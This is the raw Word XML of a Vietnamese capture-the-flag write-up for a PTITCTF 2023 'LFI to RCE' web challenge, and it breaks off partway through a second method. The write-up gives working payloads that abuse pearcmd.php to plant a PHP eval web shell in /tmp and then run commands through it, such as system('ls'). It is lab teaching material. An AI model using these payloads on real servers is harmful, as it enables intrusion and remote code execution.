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8ACAB" w14:textId="699EE1D2" w:rsidR="00DE5290" w:rsidRPr="00DE5290" w:rsidRDefault="00DE5290">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE5290">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenge: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5290">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">lfi to rce </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67560230" w14:textId="77777777" w:rsidR="00DE5290" w:rsidRDefault="00DE5290">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61598B47" w14:textId="144F15EC" w:rsidR="002F49FE" w:rsidRDefault="003A299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Đây là 1 bài ptitctf 2023 mình làm trước khi tham gia giải </w:t>
      </w:r>
      <w:r w:rsidR="00BC1FA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sinh viên</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> với a</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n toàn thông tin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B25E1C" w14:textId="60D11589" w:rsidR="003A2999" w:rsidRDefault="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50341FE8" w14:textId="3E7CE182" w:rsidR="003A2999" w:rsidRDefault="003A299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Nó cho bạn 1 trang đăng kí.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E420AD" w14:textId="65C66EA1" w:rsidR="003A2999" w:rsidRDefault="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="088EF1E8" w14:textId="5E1F8DE4" w:rsidR="003A2999" w:rsidRPr="003A2999" w:rsidRDefault="003A2999" w:rsidP="003A2999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3A2999">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Username và Password chỉ chứa các kí tự a-zA-Z. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B93520B" w14:textId="52FDAF2D" w:rsidR="003A2999" w:rsidRDefault="003A2999" w:rsidP="003A2999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3A2999">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Username và Password phải trên 6 kí tự.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69363A3F" w14:textId="486F1EFB" w:rsidR="003A2999" w:rsidRDefault="003A2999" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7177E535" w14:textId="77777777" w:rsidR="00685ED1" w:rsidRDefault="003A2999" w:rsidP="003A299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Đăng nhập thành công, bạn sẽ được cấp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0464F6" w14:textId="4328638E" w:rsidR="003A2999" w:rsidRDefault="00685ED1" w:rsidP="003A299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PHPSESSID: </w:t>
      </w:r>
      <w:r w:rsidRPr="00685ED1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>36b82865391eff04b58c1872055b57b9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F801606" w14:textId="6FD9E368" w:rsidR="00685ED1" w:rsidRDefault="00685ED1" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14F5F71C" w14:textId="3CBD6E18" w:rsidR="00685ED1" w:rsidRDefault="00685ED1" w:rsidP="003A299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home.php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A356ABC" w14:textId="7E4C7ADF" w:rsidR="00685ED1" w:rsidRDefault="00685ED1" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5712AF47" w14:textId="291FA844" w:rsidR="00685ED1" w:rsidRDefault="00685ED1" w:rsidP="003A299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E8709DA" wp14:editId="081FB735">
            <wp:extent cx="3622675" cy="229178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046" b="38302"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3622876" cy="2291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76DAC" w14:textId="5F776455" w:rsidR="00685ED1" w:rsidRDefault="00685ED1" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0250ECAC" w14:textId="43C42221" w:rsidR="00685ED1" w:rsidRDefault="00685ED1" w:rsidP="003A299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Ứng dụng web có 3 trang: register.php, login.php, home.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565E1677" w14:textId="7290C232" w:rsidR="00685ED1" w:rsidRDefault="00685ED1" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3676F8BE" w14:textId="6A0B5337" w:rsidR="00685ED1" w:rsidRDefault="00685ED1" w:rsidP="003A299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Ứng dụng bị dính lỗ hổng file inclusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F844710" w14:textId="20A701BD" w:rsidR="00685ED1" w:rsidRDefault="00685ED1" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41FA69BB" w14:textId="2BC1BA65" w:rsidR="00685ED1" w:rsidRDefault="00685ED1" w:rsidP="003A299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sẽ có hai hướng tấn công, mình sẽ phân tích từng hướng để bạn có thêm kinh nghiệm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7EC05E" w14:textId="5FA6C1D2" w:rsidR="00685ED1" w:rsidRDefault="00685ED1" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5569FA86" w14:textId="56088FB7" w:rsidR="00685ED1" w:rsidRPr="00685ED1" w:rsidRDefault="00685ED1" w:rsidP="00685ED1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685ED1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Chính: bạn thấy ứng dụng cho đăng kí, cấp 1 phpsessid. Tham số page cho phép bạn đọc file </w:t>
      </w:r>
      <w:r w:rsidRPr="00685ED1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r w:rsidRPr="00685ED1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> LFI to RCE qua PHP sessions. Nhưng hướng tấn công này hơi khó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F54A76B" w14:textId="3C8F7E12" w:rsidR="00685ED1" w:rsidRDefault="00685ED1" w:rsidP="00685ED1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685ED1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>May mắn:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> LFI to RCE qua PHP PEARCMD.</w:t>
      </w:r>
      <w:r w:rsidRPr="00685E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Đ</w:t>
      </w:r>
      <w:r w:rsidRPr="00685ED1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ây là hướng tấn công mà mình phải mò mới biết được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E45659" w14:textId="67BEABE7" w:rsidR="00685ED1" w:rsidRDefault="00685ED1" w:rsidP="00685ED1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D5AB4A" w14:textId="5818FEB6" w:rsidR="00685ED1" w:rsidRDefault="00685ED1" w:rsidP="00685ED1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F07B3C" w14:textId="25B506D7" w:rsidR="00685ED1" w:rsidRPr="00080BF0" w:rsidRDefault="001D4A2B" w:rsidP="00685ED1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00080BF0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LFI to RCE qua PHP PEARCMD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD43229" w14:textId="63951061" w:rsidR="001D4A2B" w:rsidRDefault="001D4A2B" w:rsidP="00685ED1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E9BE76A" w14:textId="434D6777" w:rsidR="00685ED1" w:rsidRDefault="001D4A2B" w:rsidP="003A299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Mình kiểm tra tham số page có bị dính path traversal không: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B872264" w14:textId="5A3F07DB" w:rsidR="001D4A2B" w:rsidRDefault="001D4A2B" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1D38DF" w14:textId="76E145BD" w:rsidR="001D4A2B" w:rsidRDefault="001D4A2B" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00080BF0">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">?page=../ </w:t>
      </w:r>
      <w:r w:rsidRPr="001D4A2B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>Nó báo lỗi something went wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C61D69" w14:textId="6C62F0FA" w:rsidR="001D4A2B" w:rsidRDefault="001D4A2B" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AC38AA0" w14:textId="5F2ADCE3" w:rsidR="001D4A2B" w:rsidRDefault="001D4A2B" w:rsidP="003A299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tưởng nó chặn ../ nhưng không phải. Nếu bạn thử với một kí tự bình thường như a-z thì nó cũng báo như vậy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A68D15A" w14:textId="723417D9" w:rsidR="001D4A2B" w:rsidRDefault="001D4A2B" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5383DBD6" w14:textId="2A1CBA6B" w:rsidR="001D4A2B" w:rsidRDefault="001D4A2B" w:rsidP="003A299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Nếu mình thêm </w:t>
      </w:r>
      <w:r w:rsidR="00574E11">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>home</w:t>
      </w:r>
      <w:r w:rsidRPr="00080BF0">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.php/../ </w:t>
      </w:r>
      <w:r w:rsidRPr="001D4A2B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Nó sẽ báo lỗi sau: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C63737C" w14:textId="7E5237E8" w:rsidR="001D4A2B" w:rsidRDefault="001D4A2B" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3337B3A5" w14:textId="03266F9F" w:rsidR="001D4A2B" w:rsidRDefault="001D4A2B" w:rsidP="003A299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C3DC2E0" wp14:editId="3265B6E6">
            <wp:extent cx="3835400" cy="3886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E6F9" w14:textId="634F708D" w:rsidR="001D4A2B" w:rsidRDefault="001D4A2B" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799DCF06" w14:textId="27341EB1" w:rsidR="001D4A2B" w:rsidRDefault="001D4A2B" w:rsidP="003A299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Chắc chắn là dính lỗ hổng file inclusion rồi </w:t>
      </w:r>
      <w:r w:rsidRPr="001D4A2B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="007A7F03">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> thấy include(home.php/../): no such file or directory</w:t>
      </w:r>
      <w:r w:rsidR="007A7F03">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nên nghĩ là nó không chặn ../</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158A4492" w14:textId="74754777" w:rsidR="007A7F03" w:rsidRDefault="007A7F03" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5243836F" w14:textId="6103B582" w:rsidR="007A7F03" w:rsidRDefault="007A7F03" w:rsidP="003A299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Xem source mới thấy tham số page phải có </w:t>
      </w:r>
      <w:r w:rsidR="00BC1FA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Không nó sẽ báo something went wrong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094BDBB2" w14:textId="3E37F85B" w:rsidR="009218FE" w:rsidRDefault="009218FE" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="043F99D9" w14:textId="73B85C0D" w:rsidR="009218FE" w:rsidRDefault="009218FE" w:rsidP="003A299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Để khai thác được pearcmd.php thì tham số </w:t>
      </w:r>
      <w:r w:rsidRPr="009218FE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>register_argc_argv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> phải được bật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B04155" w14:textId="3EC70EDB" w:rsidR="009218FE" w:rsidRDefault="009218FE" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7591AB25" w14:textId="2D450936" w:rsidR="009218FE" w:rsidRDefault="009218FE" w:rsidP="003A299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Cách 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7F1A95" w14:textId="432BA849" w:rsidR="009218FE" w:rsidRDefault="009218FE" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE3D068" w14:textId="553E2675" w:rsidR="009218FE" w:rsidRPr="00080BF0" w:rsidRDefault="009218FE" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00080BF0">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/?+config-create+/&amp;page=../../../../usr/local/lib/php/pearcmd.php&amp;/&lt;?=eval($_GET['cmd'])?&gt;+/tmp/exec.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5635F6" w14:textId="226107F1" w:rsidR="009218FE" w:rsidRDefault="009218FE" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F7A7FC4" w14:textId="1309C636" w:rsidR="009218FE" w:rsidRDefault="009218FE" w:rsidP="003A299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E6FD054" wp14:editId="6B54107F">
            <wp:extent cx="5116010" cy="3060200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435" b="42036"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5135327" cy="3071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5B2A5" w14:textId="7070B98E" w:rsidR="009218FE" w:rsidRDefault="009218FE" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F8B7645" w14:textId="618169CB" w:rsidR="009218FE" w:rsidRDefault="009218FE" w:rsidP="003A299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Có vẻ như đã thành công. Tiếp theo mình tìm cách thực thi file trên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC4687D" w14:textId="55E951C9" w:rsidR="009218FE" w:rsidRDefault="009218FE" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72F365B5" w14:textId="7A1646BB" w:rsidR="009218FE" w:rsidRPr="00080BF0" w:rsidRDefault="009218FE" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00080BF0">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/?page=../../../../tmp/exec.php&amp;cmd=phpinfo();die();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C675B4" w14:textId="389E5EDF" w:rsidR="007A7F03" w:rsidRDefault="007A7F03" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EAA5ABE" w14:textId="77777777" w:rsidR="007A7F03" w:rsidRDefault="007A7F03" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C6B4D4" w14:textId="00140ABA" w:rsidR="007A7F03" w:rsidRDefault="007A7F03" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BEC2FA7" w14:textId="37752F18" w:rsidR="007A7F03" w:rsidRDefault="00BC7B4D" w:rsidP="003A299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716FA42" wp14:editId="1CB3C40F">
            <wp:extent cx="5486400" cy="4733311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556"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5493103" cy="4739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C75AD" w14:textId="7E5B2C09" w:rsidR="00BC7B4D" w:rsidRDefault="00BC7B4D" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB54C56" w14:textId="192DB0DA" w:rsidR="00BC7B4D" w:rsidRDefault="00BC7B4D" w:rsidP="003A299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Tìm cách thực thi lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E650FF" w14:textId="06BE0A27" w:rsidR="00BC7B4D" w:rsidRDefault="00BC7B4D" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43982088" w14:textId="1323A5EB" w:rsidR="00BC7B4D" w:rsidRPr="00080BF0" w:rsidRDefault="00BC7B4D" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00080BF0">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/?page=../../../../tmp/exec.php&amp;cmd=echo%20system('ls')%3b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB8066" w14:textId="4AA9A01F" w:rsidR="00BC7B4D" w:rsidRDefault="00BC7B4D" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6870A1A5" w14:textId="699D2AA5" w:rsidR="00BC7B4D" w:rsidRDefault="00BC7B4D" w:rsidP="003A299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Mình thấy file </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7B4D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tuiDangGiuFlagN3.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Đọc nó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D79E657" w14:textId="58866EBF" w:rsidR="00BC7B4D" w:rsidRDefault="00BC7B4D" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="385378BE" w14:textId="275A10E5" w:rsidR="00BC7B4D" w:rsidRPr="00BC7B4D" w:rsidRDefault="00BC7B4D" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7B4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flag: PTITCTF{mot_bai_lfi_co_ban_ma_phai_khong}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BEC1C8" w14:textId="721CF6E9" w:rsidR="00685ED1" w:rsidRDefault="00685ED1" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C394001" w14:textId="59A0EF8D" w:rsidR="00685ED1" w:rsidRDefault="00BC7B4D" w:rsidP="003A299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Cách 2: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E12E37F" w14:textId="05AE2880" w:rsidR="00BC7B4D" w:rsidRDefault="00BC7B4D" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0554742B" w14:textId="3AC14F11" w:rsidR="00BC7B4D" w:rsidRPr="00080BF0" w:rsidRDefault="00BC7B4D" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
